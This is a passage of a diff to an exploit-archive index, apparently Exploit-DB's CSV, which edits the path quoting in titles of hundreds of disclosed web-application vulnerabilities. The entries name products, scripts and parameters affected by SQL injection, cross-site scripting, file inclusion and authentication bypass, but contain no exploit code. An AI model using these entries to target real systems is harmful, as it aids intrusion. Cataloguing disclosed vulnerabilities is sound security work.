Injection",2007-03-16,Serapis.net,php,webapps,0 +30103,platforms/php/webapps/30103.txt,"Particle Blogger 1.2.1 - 'Archives.php' SQL Injection",2007-03-16,Serapis.net,php,webapps,0 30213,platforms/php/webapps/30213.txt,"eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities",2013-12-11,sajith,php,webapps,0 30215,platforms/ios/webapps/30215.txt,"Photo Video Album Transfer 1.0 iOS - Multiple Vulnerabilities",2013-12-11,Vulnerability-Lab,ios,webapps,0 30283,platforms/php/webapps/30283.txt,"SquirrelMail G/PGP Encryption Plugin 2.0/2.1 - Multiple Unspecified Remote Command Execution Vulnerabilities",2007-07-09,"Stefan Esser",php,webapps,0 @@ -31760,7 +31761,7 @@ id,file,description,date,author,platform,type,port 30272,platforms/java/webapps/30272.txt,"OpManager 6/7 - traceRoute.do name Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 30273,platforms/java/webapps/30273.txt,"OpManager 6/7 - reports/ReportViewAction.do Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30274,platforms/java/webapps/30274.txt,"OpManager 6/7 - admin/ServiceConfiguration.do Operation Parameter Cross-Site Scripting",2007-07-04,Lostmon,java,webapps,0 -30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - 'admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 +30275,platforms/java/webapps/30275.txt,"OpManager 6/7 - '/admin/DeviceAssociation.do' Multiple Cross-Site Scripting Vulnerabilities",2007-07-04,Lostmon,java,webapps,0 30277,platforms/php/webapps/30277.txt,"Maia Mailguard 1.0.2 - 'login.php' Multiple Local File Inclusions",2007-07-05,"Adriel T. Desautels",php,webapps,0 30282,platforms/asp/webapps/30282.txt,"Levent Veysi Portal 1.0 - Oku.asp SQL Injection",2007-07-07,GeFORC3,asp,webapps,0 30289,platforms/asp/webapps/30289.txt,"EnViVo!CMS - 'default.asp?ID' SQL Injection",2007-07-11,durito,asp,webapps,0 @@ -31768,8 +31769,8 @@ id,file,description,date,author,platform,type,port 30293,platforms/php/webapps/30293.txt,"Helma 1.5.3 - Search Script Cross-Site Scripting",2007-07-12,"Hanno Boeck",php,webapps,0 30294,platforms/php/webapps/30294.txt,"Inmostore 4.0 - 'index.php' SQL Injection",2007-07-12,Keniobats,php,webapps,0 30296,platforms/asp/webapps/30296.txt,"ActiveWeb Contentserver 5.6.2929 - 'Picture_Real_Edit.asp' SQL Injection",2007-07-13,"RedTeam Pentesting",asp,webapps,0 -30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - 'errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 -30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - 'errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 +30297,platforms/asp/webapps/30297.txt,"contentserver 5.6.2929 - '/errors/rights.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 +30298,platforms/asp/webapps/30298.txt,"contentserver 5.6.2929 - '/errors/transaction.asp?msg' Cross-Site Scripting",2007-07-13,"RedTeam Pentesting",asp,webapps,0 30299,platforms/php/webapps/30299.txt,"ActiveWeb Contentserver CMS 5.6.2929 - Client-Side Filtering Bypass",2007-07-13,"RedTeam Pentesting",php,webapps,0 30300,platforms/asp/webapps/30300.txt,"MzK Blog - Katgoster.asp SQL Injection",2007-03-23,GeFORC3,asp,webapps,0 30301,platforms/php/webapps/30301.txt,"Dating Gold 3.0.5 - 'header.php?int_path' Remote File Inclusion",2007-07-13,mostafa_ragab,php,webapps,0 @@ -31794,9 +31795,9 @@ id,file,description,date,author,platform,type,port 30318,platforms/php/webapps/30318.txt,"Insanely Simple Blog 0.4/0.5 - Cross-Site Scripting",2007-07-17,joseph.giron13,php,webapps,0 30320,platforms/php/webapps/30320.txt,"geoBlog MOD_1.0 - 'deletecomment.php?id' Arbitrary Comment Deletion",2007-07-19,joseph.giron13,php,webapps,0 30321,platforms/php/webapps/30321.txt,"geoBlog MOD_1.0 - 'deleteblog.php?id' Arbitrary Blog Deletion",2007-07-19,joseph.giron13,php,webapps,0 -30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - 'install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - 'install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 -30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - 'wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 +30323,platforms/php/webapps/30323.txt,"UseBB 1.0.7 - '/install/upgrade-0-2-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 +30324,platforms/php/webapps/30324.txt,"UseBB 1.0.7 - '/install/upgrade-0-3.php?PHP_SELF' Cross-Site Scripting",2007-07-20,s4mi,php,webapps,0 +30978,platforms/php/webapps/30978.txt,"WordPress 2.2.3 - '/wp-admin/page-new.php' popuptitle Parameter Cross-Site Scripting",2008-01-03,3APA3A,php,webapps,0 30327,platforms/asp/webapps/30327.html,"Dora Emlak 1.0 Script - Multiple Input Validation Vulnerabilities",2007-07-23,GeFORC3,asp,webapps,0 30328,platforms/asp/webapps/30328.txt,"Alisveris Sitesi Scripti - index.asp SQL Injection",2007-07-23,GeFORC3,asp,webapps,0 30329,platforms/php/webapps/30329.sh,"Gitlab 6.0 - Persistent Cross-Site Scripting",2013-12-16,hellok,php,webapps,0 @@ -31838,9 +31839,9 @@ id,file,description,date,author,platform,type,port 31467,platforms/php/webapps/31467.txt,"phpMyChat 0.14.5 - 'setup.php3' Cross-Site Scripting",2008-03-22,ZoRLu,php,webapps,0 31468,platforms/php/webapps/31468.txt,"My Web Doc 2000 Administration Pages - Multiple Authentication Bypass Vulnerabilities",2008-03-22,ZoRLu,php,webapps,0 30799,platforms/php/webapps/30799.txt,"MySpace Scripts Poll Creator - 'index.php' HTML Injection",2007-11-22,Doz,php,webapps,0 -30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - 'myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - 'modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 -30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - 'modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30873,platforms/php/webapps/30873.txt,"E-Xoops 1.0.5/1.0.8 - '/myalbum/ratephoto.php?lid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30874,platforms/php/webapps/30874.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/banners/click.php?bid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 +30875,platforms/php/webapps/30875.txt,"E-Xoops 1.0.5/1.0.8 - '/modules/arcade/index.php?gid' SQL Injection",2007-12-10,Lostmon,php,webapps,0 30423,platforms/asp/webapps/30423.txt,"Metyus Forum Portal 1.0 - Philboard_Forum.asp SQL Injection",2007-07-27,Cr@zy_King,asp,webapps,0 30424,platforms/asp/webapps/30424.txt,"Berthanas Ziyaretci Defteri 2.0 - Yonetici.asp SQL Injection",2007-07-28,Yollubunlar,asp,webapps,0 30425,platforms/asp/webapps/30425.txt,"Online Store Application Template - Sign_In.aspx SQL Injection",2007-07-28,"Aria-Security Team",asp,webapps,0 @@ -31866,7 +31867,7 @@ id,file,description,date,author,platform,type,port 30452,platforms/php/webapps/30452.txt,"J! Reactions 1.8.1 - comPath Remote File Inclusion",2007-08-04,Yollubunlar.Org,php,webapps,0 30453,platforms/php/webapps/30453.txt,"snif 1.5.2 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2007-08-06,r0t,php,webapps,0 30456,platforms/php/webapps/30456.txt,"VietPHP - '_functions.php' dirpath Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 -30457,platforms/php/webapps/30457.txt,"VietPHP - 'admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 +30457,platforms/php/webapps/30457.txt,"VietPHP - '/admin/index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30810,platforms/php/webapps/30810.txt,"Proverbs Web Calendar 1.1 - 'Password' SQL Injection",2007-11-26,JosS,php,webapps,0 30459,platforms/php/webapps/30459.txt,"VietPHP - 'index.php' language Parameter Remote File Inclusion",2007-08-07,master-of-desastor,php,webapps,0 30463,platforms/php/webapps/30463.txt,"Coppermine Photo Gallery 1.3/1.4 - 'YABBSE.INC.php' Remote File Inclusion",2007-08-08,Ma$tEr-0F-De$a$t0r,php,webapps,0 @@ -31884,7 +31885,7 @@ id,file,description,date,author,platform,type,port 30482,platforms/php/webapps/30482.txt,"Web News 1.1 - 'feed.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30483,platforms/php/webapps/30483.txt,"Web News 1.1 - 'news.php?config[root_ordner]' Remote File Inclusion",2007-08-09,Rizgar,php,webapps,0 30486,platforms/php/webapps/30486.txt,"Lib2 PHP Library 0.2 - 'My_Statistics.php' Remote File Inclusion",2007-08-11,"ilker Kandemir",php,webapps,0 -30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - WhoIs.php Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 +30487,platforms/php/webapps/30487.txt,"PHP-Stats 0.1.9.2 - 'WhoIs.php' Cross-Site Scripting",2007-08-11,vasodipandora,php,webapps,0 30488,platforms/php/webapps/30488.php,"Haudenschilt Family Connections 0.8 - 'index.php' Authentication Bypass",2007-08-11,"ilker Kandemir",php,webapps,0 30489,platforms/php/webapps/30489.txt,"Openads (PHPAdsNew) < 2.0.8 - 'lib-remotehost.inc.php' Remote File Inclusion",2007-08-11,Ma$tEr-0F-De$a$t0r,php,webapps,0 30492,platforms/php/webapps/30492.txt,"SkilMatch Systems JobLister3 - 'index.php' SQL Injection",2007-07-13,joseph.giron13,php,webapps,0 @@ -31893,15 +31894,15 @@ id,file,description,date,author,platform,type,port 30505,platforms/asp/webapps/30505.txt,"Text File Search Classic - TextFileSearch.asp Cross-Site Scripting",2007-08-17,GeFORC3,asp,webapps,0 30509,platforms/php/webapps/30509.txt,"Dalai Forum 1.1 - 'forumreply.php' Local File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 30510,platforms/php/webapps/30510.txt,"Firesoft - 'Class_TPL.php' Remote File Inclusion",2007-08-20,DarKdewiL,php,webapps,0 -30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 - Uyeler2.php SQL Injection",2007-08-20,dumenci,php,webapps,0 +30511,platforms/php/webapps/30511.txt,"Gurur Haber 2.0 - 'Uyeler2.php' SQL Injection",2007-08-20,dumenci,php,webapps,0 30514,platforms/java/webapps/30514.txt,"ALeadSoft Search Engine Builder - Search.HTML Cross-Site Scripting",2007-08-21,MustLive,java,webapps,0 30515,platforms/php/webapps/30515.txt,"coWiki - 'index.php' Cross-Site Scripting",2007-08-21,MustLive,php,webapps,0 30516,platforms/php/webapps/30516.txt,"m-phorum 0.3 - 'index.php' Cross-Site Scripting",2007-08-21,CodeXpLoder'tq,php,webapps,0 -30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - 'pages/delete_page.php?id' SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 -30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - Pool index.php Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 +30518,platforms/php/webapps/30518.txt,"Ripe Website Manager 0.8.x - '/pages/delete_page.php?id' SQL Injection",2007-08-22,"Nagendra Kumar G",php,webapps,0 +30520,platforms/php/webapps/30520.txt,"WordPress 1.0.7 - 'Pool index.php' Cross-Site Scripting",2007-08-13,MustLive,php,webapps,0 30525,platforms/php/webapps/30525.txt,"Arcadem 2.01 - 'index.php' Remote File Inclusion",2007-08-24,sm0k3,php,webapps,0 30531,platforms/php/webapps/30531.txt,"AutoIndex PHP Script 2.2.1 - 'index.php' Cross-Site Scripting",2007-08-27,d3hydr8,php,webapps,0 -30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - Viewevent.php SQL Injection",2007-08-27,s0cratex,php,webapps,0 +30533,platforms/php/webapps/30533.txt,"Dale Mooney Calendar Events - 'Viewevent.php' SQL Injection",2007-08-27,s0cratex,php,webapps,0 30534,platforms/php/webapps/30534.txt,"PHPGedView 4.1 - 'login.php' Cross-Site Scripting",2007-08-27,"Joshua Morin",php,webapps,0 30539,platforms/php/webapps/30539.txt,"ACG News 1.0 - 'index.php' Multiple SQL Injections",2007-08-28,SmOk3,php,webapps,0 30541,platforms/asp/webapps/30541.txt,"Cisco CallManager 4.2 / CUCM 4.2 - Logon Page 'lang' SQL Injection",2007-08-29,anonymous,asp,webapps,0 @@ -31911,25 +31912,25 @@ id,file,description,date,author,platform,type,port 31030,platforms/php/webapps/31030.pl,"WordPress Plugin SpamBam - Key Calculation Security Bypass",2007-01-15,Romero,php,webapps,0 30872,platforms/php/webapps/30872.txt,"DomPHP 0.83 - SQL Injection",2014-01-13,Houssamix,php,webapps,0 30553,platforms/php/webapps/30553.txt,"Toms Gästebuch 1.00 - 'form.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 -30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - 'admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 +30554,platforms/php/webapps/30554.txt,"Toms Gästebuch 1.00 - '/admin/header.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-07,cod3in,php,webapps,0 30555,platforms/php/webapps/30555.txt,"MKPortal 1.0/1.1 - admin.php Authentication Bypass",2007-09-03,Demential,php,webapps,0 -30556,platforms/php/webapps/30556.html,"Claroline 1.x - 'inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 -30557,platforms/php/webapps/30557.txt,"Claroline 1.x - 'admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 -30558,platforms/php/webapps/30558.txt,"Claroline 1.x - 'admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 -30559,platforms/php/webapps/30559.txt,"Claroline 1.x - 'admin/campusProblem.php?view' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30556,platforms/php/webapps/30556.html,"Claroline 1.x - '/inc/lib/language.lib.php?language' Traversal Local File Inclusion",2007-09-03,"Fernando Munoz",php,webapps,0 +30557,platforms/php/webapps/30557.txt,"Claroline 1.x - '/admin/adminusers.php?dir' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30558,platforms/php/webapps/30558.txt,"Claroline 1.x - '/admin/advancedUserSearch.php?action' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 +30559,platforms/php/webapps/30559.txt,"Claroline 1.x - '/admin/campusProblem.php?view' Cross-Site Scripting",2007-09-03,"Fernando Munoz",php,webapps,0 30560,platforms/php/webapps/30560.txt,"212Cafe WebBoard 6.30 - 'Read.php' SQL Injection",2007-09-04,"Lopez Bran Digrap",php,webapps,0 31025,platforms/cgi/webapps/31025.txt,"Garment Center - 'index.cgi' Local File Inclusion",2008-01-14,Smasher,cgi,webapps,0 30877,platforms/php/webapps/30877.txt,"Roundcube Webmail 0.1 - CSS Expression Input Validation",2007-11-10,"Tomas Kuliavas",php,webapps,0 30878,platforms/php/webapps/30878.txt,"Bitweaver 1.x/2.0 - users/register.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 30879,platforms/php/webapps/30879.txt,"Bitweaver 1.x/2.0 - search/index.php URL Cross-Site Scripting",2007-11-10,Doz,php,webapps,0 -30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - 'search/index.php?highlight' SQL Injection",2007-11-10,Doz,php,webapps,0 +30880,platforms/php/webapps/30880.txt,"Bitweaver 1.x/2.0 - '/search/index.php?highlight' SQL Injection",2007-11-10,Doz,php,webapps,0 30881,platforms/php/webapps/30881.txt,"PHP-Nuke 8.0 - 'autohtml.php' Local File Inclusion",2007-11-10,d3v1l,php,webapps,0 30563,platforms/jsp/webapps/30563.txt,"Apache Tomcat 5.5.15 - cal2.jsp Cross-Site Scripting",2007-09-04,"Tushar Vartak",jsp,webapps,0 30564,platforms/asp/webapps/30564.txt,"E-Smart Cart 1.0 - 'login.asp' SQL Injection",2007-09-04,SmOk3,asp,webapps,0 30568,platforms/php/webapps/30568.txt,"Pulsewiki And Pawfaliki 0.5.1 - 'index.php' Local File Inclusion",2007-09-06,mafialbano,php,webapps,0 30570,platforms/php/webapps/30570.txt,"Toms Gastebuch 1.00/1.01 - header.php Multiple Cross-Site Scripting Vulnerabilities",2007-09-08,hd1979,php,webapps,0 30571,platforms/asp/webapps/30571.txt,"Proxy Anket 3.0.1 - anket.asp SQL Injection",2007-09-10,Yollubunlar.Org,asp,webapps,0 -30572,platforms/php/webapps/30572.txt,"PHPMyQuote 0.20 - 'index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 +30572,platforms/php/webapps/30572.txt,"PHPMyQuote 0.20 - '/index.php' SQL Injection / Cross-Site Scripting",2007-09-10,Yollubunlar.Org,php,webapps,0 30573,platforms/php/webapps/30573.txt,"SisfoKampus - dwoprn.php Arbitrary File Download",2007-09-10,PUPET,php,webapps,0 30575,platforms/php/webapps/30575.txt,"BOINC 5.10.20 - 'forum_forum.php?id' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 30576,platforms/php/webapps/30576.txt,"BOINC 5.10.20 - 'text_search_action.php?search_string' Cross-Site Scripting",2007-09-12,Doz,php,webapps,0 @@ -31960,7 +31961,7 @@ id,file,description,date,author,platform,type,port 32388,platforms/php/webapps/32388.txt,"Cars & Vehicle - 'page.php' SQL Injection",2008-09-17,"Hussin X",php,webapps,0 33984,platforms/hardware/webapps/33984.rb,"NETGEAR WNR1000v3 - Password Recovery Credential Disclosure (Metasploit)",2014-07-07,c1ph04,hardware,webapps,0 30581,platforms/php/webapps/30581.txt,"CS-Guestbook 0.1 - Login Credentials Information Disclosure",2007-09-12,Cr@zy_King,php,webapps,0 -30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - Tracking.php Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 +30583,platforms/php/webapps/30583.txt,"PHP-Stats 0.1.9.2 - 'Tracking.php' Cross-Site Scripting",2007-09-14,root@hanicker.it,php,webapps,0 30585,platforms/cgi/webapps/30585.txt,"Axis Communications 207W Network Camera - Web Interface axis-cgi/admin/restart.cgi Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 30586,platforms/cgi/webapps/30586.txt,"Axis Communications 207W Network Camera - Web Interface 'axis-cgi/admin/pwdgrp.cgi' Multiple Cross-Site Request Forgery Vulnerabilities",2007-09-14,"Seth Fogie",cgi,webapps,0 30587,platforms/cgi/webapps/30587.txt,"Axis Communications 207W Network Camera - Web Interface admin/restartMessage.shtml server Parameter Cross-Site Request Forgery",2007-09-14,"Seth Fogie",cgi,webapps,0 @@ -31968,7 +31969,7 @@ id,file,description,date,author,platform,type,port 30591,platforms/cgi/webapps/30591.txt,"Alcatel-Lucent OmniPCX Enterprise 7.1 - Remote Command Execution",2007-09-17,"RedTeam Pentesting GmbH",cgi,webapps,0 30594,platforms/php/webapps/30594.txt,"Coppermine Photo Gallery 1.4.12 - 'referer' Cross-Site Scripting",2007-09-17,L4teral,php,webapps,0 30595,platforms/php/webapps/30595.txt,"Coppermine Photo Gallery 1.4.12 - 'log' Local File Inclusion",2007-09-17,L4teral,php,webapps,0 -30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - hilfe.php Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 +30596,platforms/php/webapps/30596.txt,"b1gMail 6.3.1 - 'hilfe.php' Cross-Site Scripting",2007-09-17,malibu.r,php,webapps,0 30597,platforms/cgi/webapps/30597.txt,"LevelOne WBR3404TX Broadband Router - RC Parameter Cross-Site Scripting Vulnerabilities",2007-09-19,azizov,cgi,webapps,0 30598,platforms/cgi/webapps/30598.txt,"WebBatch - 'webbatch.exe' URL Cross-Site Scripting",2007-09-20,Doz,cgi,webapps,0 30599,platforms/cgi/webapps/30599.txt,"WebBatch - 'webbatch.exe?dumpinputdata' Remote Information Disclosure",2007-09-20,Doz,cgi,webapps,0 @@ -31976,7 +31977,7 @@ id,file,description,date,author,platform,type,port 30602,platforms/php/webapps/30602.html,"WordPress 2.0 - 'wp-register.php' Multiple Cross-Site Scripting Vulnerabilities",2007-09-22,"Adrian Pastor",php,webapps,0 30603,platforms/php/webapps/30603.html,"XCMS 1.1/1.7 - Password Parameter Arbitrary PHP Code Execution",2007-09-22,x0kster,php,webapps,0 30606,platforms/cgi/webapps/30606.txt,"Urchin 5.7.x - session.cgi Cross-Site Scripting",2007-09-24,pagvac,cgi,webapps,0 -30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - index.php SQL Injection",2007-09-24,"nights shadow",php,webapps,0 +30607,platforms/php/webapps/30607.txt,"bcoos 1.0.10 Arcade Module - 'index.php' SQL Injection",2007-09-24,"nights shadow",php,webapps,0 30608,platforms/jsp/webapps/30608.txt,"JSPWiki 2.5.139 - 'NewGroup.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30609,platforms/jsp/webapps/30609.txt,"JSPWiki 2.5.139 - edit.jsp edittime Parameter Cross-Site Scripting",2007-09-25,"Jason Kratzer",jsp,webapps,0 30610,platforms/jsp/webapps/30610.txt,"JSPWiki 2.5.139 - 'Comment.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 @@ -31985,7 +31986,7 @@ id,file,description,date,author,platform,type,port 30613,platforms/jsp/webapps/30613.txt,"JSPWiki 2.5.139 - 'Diff.jsp' Multiple Cross-Site Scripting Vulnerabilities",2007-09-25,"Jason Kratzer",jsp,webapps,0 30614,platforms/php/webapps/30614.txt,"PHP-Nuke Dance Music Module - 'index.php' Local File Inclusion",2007-09-25,waraxe,php,webapps,0 30615,platforms/php/webapps/30615.txt,"SimpGB 1.46.2 - 'admin/' Default URI l_username Parameter Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 -30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - 'admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 +30616,platforms/php/webapps/30616.txt,"SimpGB 1.46.2 - '/admin/emoticonlist.php?l_emoticonlist' Cross-Site Scripting",2007-09-25,netVigilance,php,webapps,0 30617,platforms/php/webapps/30617.txt,"SimpNews 2.41.3 - 'l_username' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30618,platforms/php/webapps/30618.txt,"SimpNews 2.41.3 - 'backurl' Cross-Site Scripting",2007-09-25,"Jesper Jurcenoks",php,webapps,0 30621,platforms/asp/webapps/30621.txt,"Novus 1.0 - Buscar.asp Cross-Site Scripting",2007-09-27,Zutr4,asp,webapps,0 @@ -32016,9 +32017,9 @@ id,file,description,date,author,platform,type,port 30659,platforms/php/webapps/30659.txt,"Nucleus CMS 3.0.1 - 'index.php' Cross-Site Scripting",2007-10-11,MustLive,php,webapps,0 30660,platforms/php/webapps/30660.txt,"Scott Manktelow Design Stride 1.0 Courses - 'detail.php' Multiple SQL Injections",2007-10-11,durito,php,webapps,0 30661,platforms/cgi/webapps/30661.txt,"Google Urchin 5.7.3 - Report.cgi Authentication Bypass",2007-10-11,MustLive,cgi,webapps,0 -30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - Content Management System main.php SQL Injection",2007-10-11,durito,php,webapps,0 +30662,platforms/php/webapps/30662.txt,"Scott Manktelow Design Stride 1.0 - 'Content Management System main.php' SQL Injection",2007-10-11,durito,php,webapps,0 30663,platforms/php/webapps/30663.txt,"Linkliste 1.2 - 'index.php' Multiple Remote File Inclusions",2007-10-11,iNs,php,webapps,0 -30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - Merchant shop.php SQL Injection",2007-10-11,durito,php,webapps,0 +30664,platforms/php/webapps/30664.txt,"Scott Manktelow Design Stride 1.0 - 'Merchant shop.php' SQL Injection",2007-10-11,durito,php,webapps,0 30665,platforms/hardware/webapps/30665.txt,"Nisuta NS-WIR150NE / NS-WIR300N Wireless Routers - Remote Management Web Interface Authentication Bypass",2014-01-03,"Amplia Security Advisories",hardware,webapps,0 30667,platforms/hardware/webapps/30667.txt,"Technicolor TC7200 - Multiple Cross-Site Request Forgery Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 30668,platforms/hardware/webapps/30668.txt,"Technicolor TC7200 - Multiple Cross-Site Scripting Vulnerabilities",2014-01-03,"Jeroen - IT Nerdbox",hardware,webapps,0 @@ -32032,23 +32033,23 @@ id,file,description,date,author,platform,type,port 30675,platforms/jsp/webapps/30675.txt,"InnovaPortal - tc/contents/home001.jsp contentid Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30676,platforms/jsp/webapps/30676.txt,"InnovaPortal - msg.jsp msg Parameter Cross-Site Scripting",2007-10-15,JosS,jsp,webapps,0 30682,platforms/php/webapps/30682.txt,"SiteBar 3.3.8 - 'translator.php?dir' Traversal Arbitrary File Access",2007-10-18,"Robert Buchholz",php,webapps,0 -30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - 'translator.php upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 +30683,platforms/php/webapps/30683.txt,"SiteBar 3.3.8 - '/translator.php upd/cmd/Action/edit' Arbitrary PHP Code Execution",2007-10-18,"Robert Buchholz",php,webapps,0 30684,platforms/php/webapps/30684.txt,"SiteBar 3.3.8 - 'integrator.php?lang' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30685,platforms/php/webapps/30685.txt,"SiteBar 3.3.8 - 'index.php' target Parameter Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30686,platforms/php/webapps/30686.txt,"SiteBar 3.3.8 - 'command.php?Modify User Action uid' Cross-Site Scripting",2007-10-18,"Robert Buchholz",php,webapps,0 30804,platforms/php/webapps/30804.txt,"VBTube 1.1 - Search Cross-Site Scripting",2007-11-24,Crackers_Child,php,webapps,0 30689,platforms/php/webapps/30689.php,"Taboada Macronews 1.0 - SQL Injection",2014-01-04,Jefrey,php,webapps,0 31027,platforms/php/webapps/31027.txt,"pMachine Pro 2.4.1 - Multiple Cross-Site Scripting Vulnerabilities",2008-01-14,fuzion,php,webapps,0 -31028,platforms/php/webapps/31028.txt,"Article Dashboard - 'admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,php,webapps,0 +31028,platforms/php/webapps/31028.txt,"Article Dashboard - '/admin/login.php' Multiple SQL Injections",2008-01-15,Xcross87,php,webapps,0 31029,platforms/php/webapps/31029.pl,"WordPress Plugin Peter's Math Anti-Spam 0.1.6 - Audio CAPTCHA Security Bypass",2008-01-15,Romero,php,webapps,0 30691,platforms/php/webapps/30691.txt,"Alcatel Lucent Omnivista 4760 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-18,"Miguel Angel",php,webapps,0 30693,platforms/php/webapps/30693.txt,"SocketKB 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,"Ivan Sanchez",php,webapps,0 -30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - lostpwd.php Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 -30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - rnote.php Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 +30694,platforms/php/webapps/30694.txt,"Socketmail 2.2.1 - 'lostpwd.php' Cross-Site Scripting",2007-10-19,"Ivan Sanchez",php,webapps,0 +30695,platforms/php/webapps/30695.txt,"rNote 0.9.7 - 'rnote.php' Multiple Cross-Site Scripting Vulnerabilities",2007-10-19,RoMaNcYxHaCkEr,php,webapps,0 30696,platforms/asp/webapps/30696.txt,"SearchSimon Lite 1.0 - Filename.asp Cross-Site Scripting",2007-10-20,"Aria-Security Team",asp,webapps,0 30697,platforms/php/webapps/30697.txt,"ReloadCMS 1.2.5 - 'index.php' Local File Inclusion",2007-10-20,sekuru,php,webapps,0 30698,platforms/php/webapps/30698.txt,"Flatnuke3 File Manager Module - Unauthorized Access",2007-10-22,KiNgOfThEwOrLd,php,webapps,0 -30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - Blocco.php Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 +30699,platforms/php/webapps/30699.txt,"Hackish 1.1 - 'Blocco.php' Cross-Site Scripting",2007-10-22,Matrix86,php,webapps,0 30700,platforms/php/webapps/30700.txt,"deeemm CMS (dmcms) 0.7 - 'index.php' SQL Injection",2007-10-22,"Aria-Security Team",php,webapps,0 30701,platforms/php/webapps/30701.txt,"Jeebles Technology Jeebles Directory 2.9.60 - 'download.php' Local File 